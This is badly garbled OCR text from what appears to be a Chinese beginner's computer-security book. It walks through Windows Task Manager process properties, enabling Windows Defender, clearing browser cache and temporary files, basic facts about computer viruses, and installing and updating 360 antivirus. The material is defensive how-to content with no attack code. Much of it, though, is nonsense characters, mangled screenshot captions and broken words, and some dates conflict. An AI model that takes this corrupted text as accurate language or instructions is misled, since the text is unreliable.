》 向 Windows 帘 源 管理 各 (3) 
同人 抱 管 于 
后 台 进 程 (41) 
后 360 字 全 济 和 器 
后 360 安 全 过 器 
后 360 安 全 5 器 
后 360 安 全 济 澳 器 
后 360 安 全 济 光 器 


创建 时 间 。。 2018 年 7 月 9 日 ，112439 
修改 时 间 。。 2012 年 12 月 18 日 ,1836.04 


访问 时 间 。。 2018 年 12 月 1 日 ，15:2845 


Di 口 ReR Oma 高 织 (Di- 


CJ Tw ] 攻 曾 
) 简略 信息 (D) 嬉 来 E 务 但 

[step 图 在 进程 列表 中 选择 需要 查看 的 进程 并 
右 击 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ” Se 
选项 。 


高 吉 归 人 和 


Da 
同人 -oO x 回 旺 了 六 村 时 性 外 ， 还 区 洗 雪 引 此 六 必 的 只 人 
文件 ”选项 (0) 查看 V) 
进程 ”性 前 “应 用 历史 记录 “启动 用 户 详细 信息 服务 Oo a sno 
到 8% 80% 口 mssler) a D) 
名 称 状 记 


Ce Jw | 


16MB 选择 “兼容 1 选项 卡 ， 可 以 设置 进 
程 的 兼用 模式 。 


到 Bdndicatorexe 导 性 x 


〉 国 360 主 动态 各 服务 模 岂 (32 位) 

国 Application Frame Host 
Bindicator G2 的 WE 四 
国 BrYNcsve G2 爷 资源 信 V) 
国 COM Surrogate 
国 COM Surrogate 

》 回 Cortana ( 寺 O 
区 CTF EB 序 


国 Device Association | 


司 360 亲 喜 主 但 序 


加 
: 


宗 规 。 甘 安 性 安全 洋 吕 信息 以 前 的 村 地 


如 果 此 程序 不 家 三 这 个 版 李 的 Windows 上 正常 工作 ， 请 涯 坛 运行 鞭 
宕 性 尖 兴 角 知 


和 EPSevice.exe (32 位 ] 


322892323222222 


各 但 生动 渤 尘 着 窑 性 发 窒 ? 
> 
甘 宏 楼 式 
) 简 路 信息 (D) 于 素 任务 四 各 
Whoows 7 


[Step 加 弹出 “BrIndicator.exe 属 性 ”对 话 
框 ， 在 此 可 以 看 到 进程 的 文件 类 型 、 描 村 

述 、 位 置 、 大 小 和 占用 空间 等 属性 。 ss : 
[sep 图 单 去 “高 级 ”按钮 ， 弹 出 “高 级 属 全 
性 ”对 话 框 ， 在 此 可 以 设置 文件 属性 和 压 a 

缩 或 加 密 属 性 ， 单 击 “ 确 定 ” 按 钮 ， 保 存 aon 
设置 。 


az || wx | 项 
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step 国 单 去 “安全 ”选项 卡 ， 可 以 看 到 不 
同 的 用 户 对 进程 的 权限 ， 单 击 “ 编 辑 ” 按 
钮 ， 可 以 更 改 相关 权限 。 


瑟 Brindicator.exe 层 住 x 


尖 规 。 莱 记 性 安全 。 党 信 息 “以 前 的 版 本 


对 全 名 不 : CAprogram Files ex86)Virownyind\BrothervBrinc 


申 SYSTEM 
让 Administrators (DESKTOP-RJKNMOcWdministratorg) 
让 Users (DESKTOP-RJKNMOC\Users) 


要 更 改 公 限 ， 请 二 - 护 扣 "， EP 


ALL AppLICATION PACKAGES 
zt 许 拒 反 


完全 控制 
修改 

读 取 和 执行 
读 取 

入 
每 至 权限 


有 关 行 琳 权 限 或 级 设 年， 再 单 高级. WW 


[step 图 选择 “详细 信息 ”选项 卡 ， 可 以 查看 
进程 的 文件 说 明 、 类 型 、 产 品 版 本 和 大 小 
等 信息 。 

到 Brindicator.exe 属性 x 


乱 规 。 莫 容 性 安全 。 说 癌 信 息 以 前 的 版 本 


[3 
衣 

文昌。 Brlndicator 

WE 

文件 版 本 1.0.10.0 

产品 你 。 Brlndicator 

产品 版 本 1.0.10.0 

[so Copyriaht (0) 2012.2013 Bother Industries, .| 
大 小 179MB 


修改 日 期 。 2012112118 18:36 
语言 日 语 介 吉 ) 
A 忻 各 Brindicator exe 


确定 取 汉 站 有 和 


[ee 图 选择 “以 前 的 版 本 ”选项 卡 ， 可 以 恢 
复 到 以 前 的 状态 。 查 看 完成 后 ， 单 击 “ 确 
定 ”按钮 即 可 。 
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瑟 gdndicstorexe 忆 生 x 
二 去 主 。 # 旨 合生 “前 的 是 


Man 


Ca 


[See 本 在 进程 列表 中 查找 多 余 的 进程 ， 然 后 
选择 进程 并 单 击 鼠 标 右键 ， 从 弹出 的 快捷 
菜单 中 选择 “结束 任务 ”命令 ， 即 可 结束 
选中 的 进程 。 


文 # 运 项 (DO) 下 在) 
斌 本 ”性 能“ 应 月 历史 记录 证 动 月 户主 组 信息 服务 


人 aoa 
后 台 进 程 36) 
国 350= 全 P+ sei 
避 350==P+ 网 看 
辣 350MIR 和 二 
EE nad 
@ 250=in 和 要 


本 Appfeatcn Fr 一 -二 


国 browser Brot ma 


EV) 


司 COM Surrogs 
图 corana Us 
国 igfculsevia 


2 


篇 中 信息 0) 


实战 演练 2 一 一 使 用 Windows Defender 
保护 系统 


Windows Defender 是 Windows 10 操 作 
系统 的 一 项 功能 ， 主 要 用 于 帮助 用 户 抵 御 
间谍 软件 和 其 他 潜在 的 有 害 软 件 的 攻击 ， 
但 在 系统 默认 情况 下 ， 该 功能 是 不 开启 
的 。 下 面 介绍 如 何 开启 Windows Defender 
功能 。 


step 国 单 去“ 开始 ”按钮 ， 从 弹出 的 快捷 
菜单 中 选择 “控制 面板 ”选项 ， 即 可 打开 
“所 有 控制 面板 项 ”窗口 。 
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去 全 性 与 维护 x 


加 所 有 控制 画板 项 


个 国 ， 控 制 面板 所 有 控制 画 析 项 > vo 
义 御 (里 弓 (E) 宣 寿 V) 工 上 


词 天 计算 机 89 十 
融 [ 360 浊 力 务 载 (32 倍 < 斑 BittockeraEahB 富 
Flash player (32 位) 0 ntemetis 


杞 RemoteApp 和 桌面 连接 输 Defender 防火 


Bs Windows To Go 各 安全 和 维护 
六 和 BFWindows 7 ”六 程 襄 和 功能 


单 击 “Windows Defender” 超 链接 ， 


即 可 打开 “Windows Defender” 窗 口 ， 提 示 


用 户 此 应 用 已 经 关闭 。 


MW Windows Defender 
@ laesxn , Taitraitimn. 


如 果 你 正在 使 用 其 他 应 用 检 音 恶意 软件 或 垃 极 软件 ， 清 便 用 "安全 人 性 与 浊 护 " 裕 查 
该 应 用 的 状态- 


step 国 在 “控制 面板 ”窗口 中 单 击 “ 安 全 性 
与 维护 ” 超 链 接 ， 打 开 “ 安 全 性 与 维护 ” 


窗口 。 


Sep 
+ 人 
交 村 I。 关 届 自 。 宣 V) 工 贞 Mm 二 ) 


om 主页 


查看 二 新 泊 鱼 并 舰 决 问 有 
人 个 


| 你 希望 运行 此 应 用 吗 ? 

“你 应 当 只 运行 由 信任 的 发 布 者 提供 的 应 用 。 
发 行者 : Qihoo 360 Software (Beijing) Company Limited 
程序 : 360 安 全 中 心 
CNProgram Files\360\360safe\safemon\360Tray.exe 
一 是 ,我 信任 这 个 发 布 者 ， 希 望 运行 此 应 用 
一 否 ,我 希望 在 运行 此 应 用 前 验证 发 布 者 的 

身份 


口 不 本 未 此 信息 . 取消 


[sp 图 单 击 “ 是 ， 我 信任 这 个 发 布 者 ， 希 望 
运行 此 应 用 ” 超 链接 ， 即 可 启用 Windows 
Defender 服 务 。 


4.8 小 试 身手 


练习 1: 删除 上 网 缓存 文件 
用 户 可 以 通过 “Internet 选 项 ”对 话 框 品 委 汪 

来 删除 平时 上 网 的 缓存 文件 ， 具 体 的 操作 

步骤 如 下 。 

右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜单 

中 选择 “控制 面板 ” 选项， 打开 “所 有 控制 面 

板 项 ”窗口 ， 单 击 “Intemet 选 项 ” 超 链 接 。 


所 有 注 制 面板 项 


个 国 ， 控 制 .。， 所 有 控制 面板 项 > vo 
文件 (篇 六 (E) 下 看 V) 工具 (7) 帮助 H) 


搜索 控制 面板 7 


调整 计算 机 的 设置 坦 看 方式 ， 大 加 款 ~ 


< 只 Bitiocker 到 an 这 


全 


Flash Player 


DD Len 


Mail (Microj 


EF 
2016) LE 


去) 围 windows Defender > Windows To Go 
pt em Eg Windows 防火 墙 和 安全 和 给 六 
ESD ss 
堵 名 bEmWindows 7 闻 程 和 mm 能 
B 350F 人 E+ ExR. ， v 
bres Sas 
i [step 图 弹出 “Internet 属 性 ”对 话 框 ， 单 击 
ELeaaezm ,na wreneensgere | BE “浏览 历史 记录 ” 下 的 “删除 ” 按钮 。 
要 ee ea 


step 罗 单 去 “间谍 软件 和 垃圾 软件 防护 ”后 
面 的 “立即 启用 ”按钮 ， 弹 出 如 下 图 所 示 


[step 图 弹出 “删除 浏览 历史 记录 ”对 话 框 ， 
选择 需要 删除 的 缓存 文件 类 型 ， 单 击 “ 删 
除 ”按钮 。 
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| ree 
下 起 
=n 
从 seaz=ser ,sse 一 eam 


| 二 ew 


加 人 M RD 
保科 Cockie 和 Intermet 文件， 以 代 作 必 囊 鸣 风 汪 北欧 信 六 闻 二 大 
境 寺 于吉 太 


BN Internet 文件 和 网站 六 铂 CD 
以 


cookie sie(O) 
网 站 为 了 办 村 和 项 大 r 黄 网 站 性 刘表 在 全 算 只 上 的 立 件 或 
所 许 。 


辐 历史 记录) 
EA 


团 Tic 录 (W) 
作 己 下风 立 伯 的 列表 


回击 他 竹 所 (P 

全 在 要 地 和 妊 入 的 全， 

于 8(P) 
ED 
占 时 辽 吕 tr、"ActiveX 名 先 "和 "请 各 如 芝 - 里 00 


Mri HG met 
沪 几 法 的 又 以 及 "后 知 将 0 的 隐 


E23 Bee(D) 


Step 加 弹出 “删除 浏览 历史 记录 ”窗口 ， 系 
统 开 始 自 动 删除 上 网 的 缓存 文件 。 


| "5 删 险 浏览 历史 记录 


一 x 


re 二 


正在 制 除 历 史记 录 … 
一 一 

Ca 
[se 图 驱除 完成 后 ， 返 回 到 “Internet 属 
性 ”对 话 框 ， 单 击 “ 浏 览 历史 记录 ”下 的 
“设置 ”按钮 。 弹 出 “网 站 数据 设置 ”对 
话 框 ， 设 置 缓存 的 大 小 和 保存 天 数 ， 单 击 
“移动 文件 夹 ”按钮 ， 可 以 转移 缓存 文件 
的 位 置 ， 单 击 “ 确 定 ”按钮 ， 完 成 设置 。 
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senioteto here eralerenofl Winder 

ro 

EM | 
EE 


练习 2: 清除 系统 临时 文件 


在 没有 安装 专业 的 清理 垃圾 软件 前 ， 
用 户 可 以 手动 清理 垃圾 临时 文件 ， 具 体 的 
操作 步骤 如 下 。 
[see 加 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”选项 。 


运行 (R) 


关机 或 注销 (U) 


[step 图 打开 “运行 ”对 话 框 ， 在 “打开 ” 文 
本 框 中 输入 cleanmgr 命 令 ， 单 击 “确定 ?” 
按钮 。 


可 ee 为 你 打开 相应 的 程序 、 
文件 关 ， 文 或 Internet 这 


#70 [Eeel 


sl 本 要 


[step 图 弹出 “磁盘 清理 : 驱动 器 选择 ” 
对 话 框 ， 单 击 “ 了 驱动 器 ” 右 侧 的 向 下 
按钮 ， 在 弹出 的 下 拉 列 表 中 选择 需要 清 
理 临 时 文件 的 磁盘 分 区 ， 本 实例 选择 
“Windows10(C:)” 选 项 。 


Bi 


玉生 清 笃 戏 动 壬 泽 


本 windowsio (C 


退出 00 


step 园 单 击 “确定 ”按钮 ， 弹 出 “磁盘 清 
理 ” 对 话 框 ， 并 开始 自动 计算 清理 磁盘 
垃圾 。 


磁盘 清理 x 
~ “ 碟 盘 清理 "正在 计算 可 以 在 Windows10(CJ 上 释放 多 少 空 
~ 同 ,这 可 能 需要 几 分 钟 时 间 。 


EEH 算 - 
ee 
正在 扫 阅 。 系统 模 江 内存 竺 全文 件 


[ep 图 弹出 “Windows10(C:) 的 磁盘 清理 ” 
对 话 框 ， 在 “要 删除 的 文件 ”列表 中 会 显 
示 扫 描 出 的 垃圾 文件 和 大 小 ， 选 择 需 要 清 
理 的 临时 文件 。 
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互 wrdwciotcyioa x 
sa 


Se RA Windows10 (C 上 的 329 MB 下 


Fae 


回 门 闫 本 3 志 文件 21L1KE A 

回 量 已 下 二 的 导 序 文具 0 地 

回电 miemet si 文件 182 MB 

回 | 肝 殴 邦人 风 Windows 千 话 下 吉文 性 510 kB 

Cl 标 顽 和 列 呈 蕉 Windowr 输 汝 报告 祥 什 2K8 YY 

pe 

传送 优 /文本 三 颖 先前 己 下 磊 引 你 的 计算 仙 、 下 当前 圭 核 传送 优化 萤 

Se 

Re 
I 人 
[| 本 

单 击 “ 清 理 系统 文件 ”按钮 ， 系 统 开 
始 自动 清理 磁盘 中 的 垃圾 文件 。 
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随 着 信息 化 社会 的 发 展 ， 电 脑病 毒 的 威胁 日 益 严重 ， 反 病毒 的 任务 也 更 加 艰巨 。 本 章 
介绍 电脑 病毒 的 防护 策略 ， 主 要 内 容 包 括 什么 是 病毒 、 常 见 的 病毒 种 类 及 如 何 防御 病毒 等 
内 容 。 


5.1 认识 电脑 病毒 


随 着 网 络 的 普及 ， 病 毒 也 更 加 泛滥 ， 它 对 计算 机 有 着 强大 的 控制 和 破坏 能 力 ， 能 够 次 
取 目 标 主机 的 登录 账户 和 密码 、 删 除 目标 主机 的 重要 文件 、 重 新 启动 目标 主机 、 使 目标 主 
机 系统 瘫痪 等 。 因 此 ， 熟 知 病毒 的 相关 知识 就 显得 非常 重要 。 


5.1.1 电脑 病毒 的 特征 和 种 类 


平常 所 说 的 电脑 病毒 ， 是 人 们 编写 的 一 种 特殊 的 电脑 程序 ， 病 毒 能 通过 修改 电脑 内 的 
其 他 程序 ， 并 把 自身 复制 到 其 他 程序 中 ， 从 而 完成 对 其 他 程序 的 感染 和 侵害 。 之 所 以 称 其 
为 “病毒 ”， 是 因为 它 具 有 与 微生物 病毒 类 似 的 特征 : 在 电脑 系统 内 生存 、 传 染 ， 还 能 进 
行 自我 复制 ， 并 且 抢占 电脑 系统 资源 ， 干 扰 电 脑 系统 正常 的 工作 。 
电脑 病毒 的 主要 特征 有 如 下 几 点 。 
电脑 病毒 的 主要 特征 
特征 具体 描述 
人 为 制造 | 在 电脑 系统 中 ， 病 毒 源 程序 是 人 为 制造 的 、 存 储 在 存储 介质 中 的 一 段 程序 代码 
隐蔽 性 病毒 源 程序 是 人 为 制造 的 短小 精 悍 的 程序 ， 这 就 使 得 它 不 易 被 察觉 和 发 现 
潜伏 性 指 源 病毒 依附 于 其 他 媒体 寄生 的 能 力 ， 侵 入 后 的 病毒 潜伏 到 条 件 成 熟 ， 才 发 作 ， 会 使 电脑 变 慢 
传染 性 源 病毒 可 以 是 一 个 独立 的 程序 体 ， 它 具有 很 强 的 再 生机 能 ， 它 能 把 自身 精确 复制 到 其 他 程序 体内 ， 从 
而 达到 扩散 的 目的 
激发 性 从 本 质 上 讲 ， 它 是 一 个 逻辑 炸弹 ， 只 要 系统 环境 满足 一 定 的 条 件 ， 通 过 外 界 刺激 可 使 病毒 程序 活跃 起 
来 。 激 发 的 本 质 是 一 种 条 件 控制 ， 不 同 的 病毒 受 外 界 控制 的 激发 条 件 也 不 一 样 
破坏 性 病毒 程序 一 旦 加 载 到 当前 运行 的 程序 上 ， 就 开始 搜索 可 进行 感染 的 程序 ， 从 而 使 病毒 很 快 扩散 到 整个 
系统 上 ， 并 破坏 磁盘 文件 的 内 容 、 删 除数 据 、 修 改 文件 、 抢 占 存储 空间 ， 甚 至 对 磁盘 进行 格式 化 处 理 


电脑 病毒 主要 有 以 下 几 类 。 

电脑 病毒 分 类 

病毒 病毒 特 症 

文件 型 病毒 | 这 种 病毒 会 将 它 自己 的 代码 附 上 可 执行 文件 〔.exe、.com、.bat 等 ) 

引导 型 病毒 | 引导 型 病毒 包括 两 类 ， 一 类 是 感染 分 区 的 ， 另 一 类 是 感染 引导 区 的 

宏 病毒 一 种 寄存 在 文档 或 模板 中 的 计算 机 病毒 ， 打 开 文档 ， 宏 病毒 会 被 激活 ， 破 坏 系统 和 文档 的 运行 


其 他 类 例如 一 些 最 新 的 病毒 使 用 网 站 和 电子 邮件 传播 ， 它 们 隐藏 在 Java 和 ActiveX 程 序 中 ， 如 果 用 户 下 载 了 
含有 这 种 病毒 的 程序 ， 它 们 便 立 即 开始 破坏 活动 


5.1.2 电脑 病毒 的 工作 流程 


计算 机 病毒 的 完整 工作 过 程 包括 以 下 
几 个 环节 和 过 程 。 

(1) 传染 源 : 病毒 总 是 依附 于 某 些 存 
储 介质 ， 如 软盘 、 硬 盘 等 构成 传染 源 。 

(2) 传染 媒介 : 病毒 传染 的 媒介 由 其 工 
作 的 环境 来 决定 的 ， 可 能 是 计算 机 网 络 ， 也 
可 能 是 可 移动 的 存储 介质 ， 如 U 盘 等 。 

(3) 病毒 激活 : 是 指 将 病毒 装 入 内 
存 ， 并 设置 触发 条 件 。 一 旦 触发 条 件 成 
熟 ， 病 毒 就 开始 自我 复制 到 传染 对 象 中， 
进行 各 种 破坏 活动 等 。 

(4) 病毒 触发 : 计算 机 病毒 一 旦 被 激 
活 ， 立 刻 就 会 发 生 作用 ， 触 发 的 条 件 是 多 
样 化 的 ， 可 以 是 内 部 时 钟 、 系 统 的 日 期 、 
用 户 标 识 符 ， 也 可 能 是 系统 一 次 通信 等 。 

(5) 病毒 表现 ， 表现 是 病毒 的 主要 目 
的 之 一 ， 有 时 在 屏幕 显示 出 来 ， 有 时 则 表 
现 为 破坏 系统 数据 。 凡 是 软件 技术 能 够 触 
发 到 的 地 方 ， 都 在 其 表现 范围 内 。 

(6) 传染 : 病毒 的 传染 是 病毒 性 能 的 
一 个 重要 标志 。 在 传染 环节 中 ， 病 毒 复 制 
一 个 自身 副本 到 传染 对 象 中 去 。 


5.1.3 ”电脑 中 毒 的 途径 


常见 电脑 中 毒 的 途径 有 以 下 几 种 。 

(1) 单 击 超 链接 中 毒 。 这 种 入 侵 方 法 
主要 是 在 网 页 中 放置 恶意 代码 来 引诱 用 户 点 
击 ， 一 旦 用 户 单 击 超 链接 ， 就 会 感染 病毒 ， 
因此 ， 不 要 随便 单 击 网 页 中 的 链接 。 

(2) 通过 恶意 插件 中 毒 。 网 站 中 存 
在 各 种 恶意 代码 ， 借 助 IE 浏 览 器 的 漏洞 ， 
强制 用 户 安装 一 些 恶 意 软件 ， 有 些 顽 固 的 
软件 很 难 印 载 。 建 议 用 户 及 时 更 新 系统 补 
丁 ， 对 于 不 了 解 的 插件 不 要 随便 安装 ， 以 
免 给 病毒 流行 可 乘 之 机 。 

(3) 通过 下 载 附带 病毒 的 软件 中 毒 。 
有 些 破解 的 软件 在 安装 时 会 附带 安装 一 下 
病毒 程序 ， 而 此 时 用 户 并 不 知道 。 建 议 用 
户 下 载 正版 的 软件 ， 尽 量 到 软件 的 官方 网 
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站 去 下 载 。 如 果 在 其 他 的 网 站 上 载 了 软 
件 ， 可 以 使 用 杀毒 软件 先 查 杀 一 遍 。 

(4) 通过 网 络 广告 中 毒 。 上 网 时 经 
常 可 以 看 到 一 些 自动 弹出 的 广告 ， 包 括 悬 
浮 广告 、 异 常 图 片 等 。 特 别 是 一 些 中 奖 广 
告 ， 往 往 带 有 病毒 链接 。 


5.1.4 电脑 中 病毒 后 的 表现 


一 般 情况 下 ， 电 脑病 毒 是 依附 某 一 系 
统 软件 或 用 户 程 序 进行 繁殖 和 扩散 ， 病 毒 
发 作 时 危机 电脑 的 正常 工作 ， 破 坏 数据 与 
程序 ， 侵 占 电脑 资源 等 。 

电脑 在 感染 病毒 后 的 现象 为 : 

(1) 屏幕 显示 异常 ， 屏 幕 显示 出 不 是 
由 正常 程序 产生 的 画面 或 字符 串 ， 屏 幕 显 
示 混 乱 。 

(2) 程序 装 入 时 间 增 长 ， 文 件 运行 速 
度 下 降 。 

(3) 用 户 并 没有 访问 的 设备 出 现 “ 忙 ” 
言 号 。 

(4) 磁盘 出 现 莫 名 其 妙 的 文件 和 磁盘 
坏 区 ， 卷 标 也 发 生变 化 。 

(5) 系统 自行 引导 。 

(6) 丢失 数据 或 程序 ， 文 件 字 节 数 发 
生变 化 。 

(7) 内 存 空 间 、 磁 盘 空 间 减 少 。 

(8) 异常 死机 。 

(9) 磁盘 访问 时 间 比 平常 增长 。 

(10) 系统 引导 时 间 增 长 。 

(11) 程序 或 数据 神秘 丢失 。 

(12) 可 执行 文件 的 大 小 发 生变 化 。 

(13) 出 现 莫名 其 妙 的 隐蔽 文件 。 


5.2 查 杀 电脑 病毒 


当 电 脑 出 现 中 毒 的 特征 后 ， 就 需要 对 其 
查 杀 病毒 。 流 行 的 杀毒 软件 很 多 ，360 杀 毒 
软件 是 当前 应 用 比较 广泛 的 杀毒 软件 之 一 ， 
该 软件 引用 双 引 擎 的 机 制 ， 拥 有 完善 的 病毒 
防护 体系 ， 不 但 查 杀 能 力 出 色 ， 而 且 对 于 新 
出 现 的 木马 病毒 能 够 第 一 时 间 进 行 防御 。 
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5.2.1 ”安装 杀毒 软件 
《360 杀 毒 》 软 件 下 载 完成 后 ， 即 可 安 


人 双击 下 载 的 《360 杀 毒 》 软 件 安装 程 
并 和 密 序 ， 即 可 打开 如 下 图 所 示 的 安装 界面 。 


360 闲 盏 5.0 


工 版 5007121 


到 ;Chprogram Fleq360\60sd 
到 家 实则 :7436 


[Se 


step 园 单 击 “立即 安装 ”按钮 ， 即 可 开始 安 
装 360 杀 毒 软件 ， 并 显示 安装 的 进度 。 


360 杀 天 5.0 


ER 版 500712 


正在 安装 ， 请 附 修 .. 


安装 完毕 后 ， 弹 出 360 新 版 特性 提示 
对 话 框 。 


单 击 “ 立 即 体验 ”按钮 ， 即 可 打开 
360 杀 毒 主 界面 ， 从 而 完成 360 杀 毒 的 安装 。 


[FE 
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SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


5.2.2 ”升级 病毒 库 


病毒 库 其 实 就 是 一 个 数据 库 ， 里 面 记录 
着 电脑 病毒 的 种 种 特征 ， 以 便 及 时 发 现 病毒 
并 绞 杀 它们 。 只 有 拥有 了 病毒 库 ， 杀 毒 软件 
才能 区 分 病毒 和 普通 程序 之 间 的 区 别 。 

新 病毒 层出不穷 ， 可 以 说 每 天 都 有 
难以 计数 的 新 病毒 产生 。 想 要 让 计算 机 能 
够 对 新 病毒 有 所 防御 ， 就 必须 要 保证 本 地 
杀毒 软件 的 病毒 库 一 直 处 于 最 新 版 本 。 
下 面 以 “360 杀 毒 ”的 病毒 库 升 级 为 例 进行 
介绍 。 


1. 手动 升级 病毒 库 

升级 360 杀 毒 病毒 库 的 具体 操作 步 又 
如 下 。 
[step 回 单 去 360 杀 毒 主 界面 的 “检查 更 新 ?” 
链接 。 


区 


za9prh， 国 国 图 SSE tit 


[step 图 弹出 “360 杀 毒 -升级 ”对 话 框 ， 提 示 
用 户 正在 升级 ， 并 显示 升级 的 进度 。 


和 @ rns sm. 


正在 革职 更 新 信息 
一 一 


使 用 时 间 : 00:00:00 


step 图 升级 完成 后 ， 弹 出 “360 杀 毒 -升级 ” 
对 话 框 ， 提 示 用 户 升 级 成 功 完成 ， 并 显示 
程序 的 版 本 等 信息 。 


加 360 杀 表 -升级 = 


后 升级 成 功 完成 ， 您 的 病毒 库 和 程序 已 是 最 新 ! 


主 程序 版 本 5.0,0.8150 
病 雪 库 日 其 无 昌 规 5 车 
梧 拦 挂 马 网 址 1511.431 
可 拦 载 的 鱼网 址 4212210 


单 击 病毒 库 日 期 右 侧 的 “立即 开启 ” 
按钮 ， 开 始 升级 病毒 库 信息 。 


【 针 ) 正在 升级 ， 请 稍 候 … 


正在 下 载 升级 所 需 的 配置 文件 . 便 用 时 间 : 00:00:04 
ee 


升级 完成 后 ， 提 示 用 户 常规 引擎 已 成 
功 安装 。 


二 常规 5 l 必 已 所 功 安装 ， 并 入 参与 以 后 的 扫 措 。 建 议 您 立即 执 


行 一 次 扫描 ! 
主 促 序 版 本 5.0.0.8150 
病毒 库 日 期 2018-11-16 14:29 
可 拦 甘 挂 马 网 址 1,511,431 
可 失声 钓鱼 网 址 4212.210 
查看 升级 日 志 关闭 


step 较 单 击 “ 查 看 升级 日 志 ” 超 链接 ， 即 可 
打开 “360 杀 毒 -日 志 ” 对 话 框 ， 在 其 中 显示 
了 产品 升级 的 记录 。 


便 可 者 杀 志 历史 
您 在 此 可 以 了 解 350 亲 者 运 行 的 历史 声 呈 有 苦 详 弓 千 号 . 
对 疝 事件 第 村 
2018-11-29 1205:45 。 手动 和 级 Avira( 小 红 公升 级 到 和 启 吉 主 S 胃 2018-11-16 1429 
2018-11-29 120449 手动 HH 级 下 名 单 了 天 者 已 二 功 天 级 


二 
加 防护 

外 文件 上 传 

困 EE 散 
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2. 制订 病毒 库 升级 计划 

为 了 减 去 用 户 实时 操心 病毒 库 更 新 的 
问题 ， 可 以 给 杀毒 软件 制订 一 个 病毒 库 自 
动 更 新 的 计划 ， 具 体 的 操作 步骤 如 下 。 
[Sep 加 打开 360 杀 毒 的 主 界面 ， 单 击 右上 角 
的 “设置 ”链接 。 


CE 


[step 图 弹出 “360 杀 毒 -设置 ”对 话 框 ， 用 户 
可 以 通过 选择 “常规 设置 ”“ 病 毒 扫 描 设 
置 ”“ 实 时 防护 设置 ”“ 升 级 设置 ”“ 系 
统 白 名 单 ”“ 免 打扰 设置 ”等 选项 ， 详 细 
地 设置 杀毒 软件 的 参数 。 


这 了 过 项 

司 甸 杂 Windows SWE 
司 六 “300 杀 而 ” 志 加 到 右 惕 么 音 
习 交 “360 广 件 委 全 ” 遍 可 到 右 刍 间 
三 用户 体验 双生 计划 了 WP 入 
一 汉 坦 厚 民生 了 Mx 作 
电动 上传 发 现 的 可 琵 各 文件 


章 关机 本 


自 侠 护 装 合 
矶 止 何 笃 菩 环 360 和 每 世 行人 jp 了 必 二 全 
© SEPEFE 
保护 
合用 宅 肥 全 六 关 而 关 委 设置， 防止 它们 六 下 总 按 效 ， 


[ep 图 选择 “升级 设置 ”选项 ， 在 弹出 的 
对 话 框 中 用 户 可 以 设置 “自动 升级 设置 ” 
和 “代理 服务 器 设置 ”， 设 置 完 成 后 单 击 
“确定 ”按钮 。 


Err 0 |omarpwanHe 
ena 


+ 
FE 二 


IE 


如 


“自动 升级 设置 ”由 以 下 4 部 分 组 成 ， 
用 户 可 根据 需求 自行 选择 。 

(1) “自动 升级 病毒 特征 库 及 程序 ”: 
选中 该 项 后 ， 只 要 360 杀 毒 程 序 发 现 网 络 
上 有 病毒 库 及 程序 的 升级 ， 就 会 马上 自动 
更 新 。 

(2) “关闭 病毒 库 自动 升级 ， 每 次 升 
级 时 提醒 ”: 网 络 上 有 版 本 升级 时 ， 不 直 
接 更 新 ， 而 是 给 用 户 一 个 升级 提示 框 ， 升 
级 与 否 由 用 户 自己 决定 。 

(3) “关闭 病毒 库 自动 升级 ， 也 不 显 
示 升 级 提醒 ”: 网 络 上 有 版 本 升级 时 ， 不 
进行 病毒 库 升 级 ， 也 不 显示 提醒 信息 。 

(4) “定时 升级 ”: 制订 一 个 升级 计 
划 ， 在 每 天 的 指定 时 间 直 接连 接 网 络 上 的 
更 新 版 本 进行 升级 。 

侈 注意 : 一 般 不 建议 读者 对 “代理 服务 器 设 
置 ” 项 进行 设置 。 


设置 定期 杀毒 


区 计算 机 通过 长 期 的 使 用 ， 可 能 会 隐藏 
wessm 有 许多 的 病毒 程序 。 为 了 刨 除 隐患 ， 应 该 
和 定时 给 计算 机 进行 全 面 的 杀毒 。 抛 去 遗忘 
的 顾虑 ， 给 杀毒 软件 设置 一 个 查 杀 计划 是 
很 有 必要 的 。 以 《360 杀 毒 》 软 件 为 例 进行 
定期 杀毒 设置 ， 具 体 的 操作 步骤 如 下 。 

单 击 “360 杀 毒 ”窗口 右上 角 的 “ 设 
置 ” 按 钮 。 


[step 图 打开 “设置 ”对 话 框 ， 选 择 “ 病 毒打 
描 设 置 ” 选 项 ， 在 “定时 查 毒 ”项 中 进行 


设置 。 
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(1) “启用 定时 查 毒 ”: 开启 或 关闭 
定时 查 毒 功能 。 

(2) “扫描 类 型 ”: 设置 扫描 的 方 
法 ， 也 可 以 说 是 范围 ， 主 要 有 “快速 扫 
描 ” 和 “全 盘 扫 描 ” 两 种 。 


(3) “每 天 ”: 制订 每 天 一 次 的 查 杀 计 
划 。 选 择 该 选项 后 ， 可 以 进行 时 间 调 整 。 

(4) “每 周 ”: 制订 每 周一 次 的 查 杀 计 
划 。 选 择 该 选项 后 ， 可 以 设置 星期 和 时 间 。 

(5) “每 月 ”: 制订 每 月 一 次 的 查 杀 计 


划 。 选 择 该 选项 后 ， 可 以 设置 日 期 和 时 间 。 


5.2.4 ”快速 查 杀 病毒 

一 旦 发 现 电脑 运行 不 正常 ， 用 户 首先 
分 析 原 因 ， 然 后 即 可 利用 杀毒 软件 进行 杀 
毒 操作 。 下 面 以 《360 杀 毒 》 查 杀 病 毒 为 例 
讲解 如 何 利用 杀毒 软件 杀毒 。 

使 用 《360 杀 毒 》 软 件 杀毒 的 具体 操作 
步骤 如 下 。 
[step 图 启动 《360 杀 毒 》 软件， 该 软件 为 用 
户 提供 了 3 个 查 杀 病毒 的 方式 ， 即 全 盘 打 
描 、 快 速 扫 描 和 自 定义 扫描 。 


0001= 


加 茹 归 


全 汉 


step 较 这 里 选择 快速 扫描 方式 ， 单 击 “ 快 速 
扫描 ”按钮 ， 即 可 开始 扫描 系统 中 的 病毒 
交 御 < 


step 图 在 扫描 的 过 程 中 ， 如 果 发 现 木马 病 
毒 ， 则 会 在 下 面 的 空格 中 显示 扫描 出 来 的 
木马 病毒 ， 并 列 出 了 其 危险 程度 和 相关 描 
述 信息 。 

[ww | 


| Sci = EE 


a EE 


ee) ssa en 
ee) Fs en 
ee Kas a 
en) Ves etc a 5 
HERE EU/OWNA2066 Mo en 
ee 
a 


mam 


RE Ba 


WADE (SEAADA1-S711 Lasn- 025 8 I 


单 南 “立即 处 理 ” 按 钮 ， 即 可 删除 扫 
描 出 来 的 木马 病毒 或 安全 威胁 对 象 。 


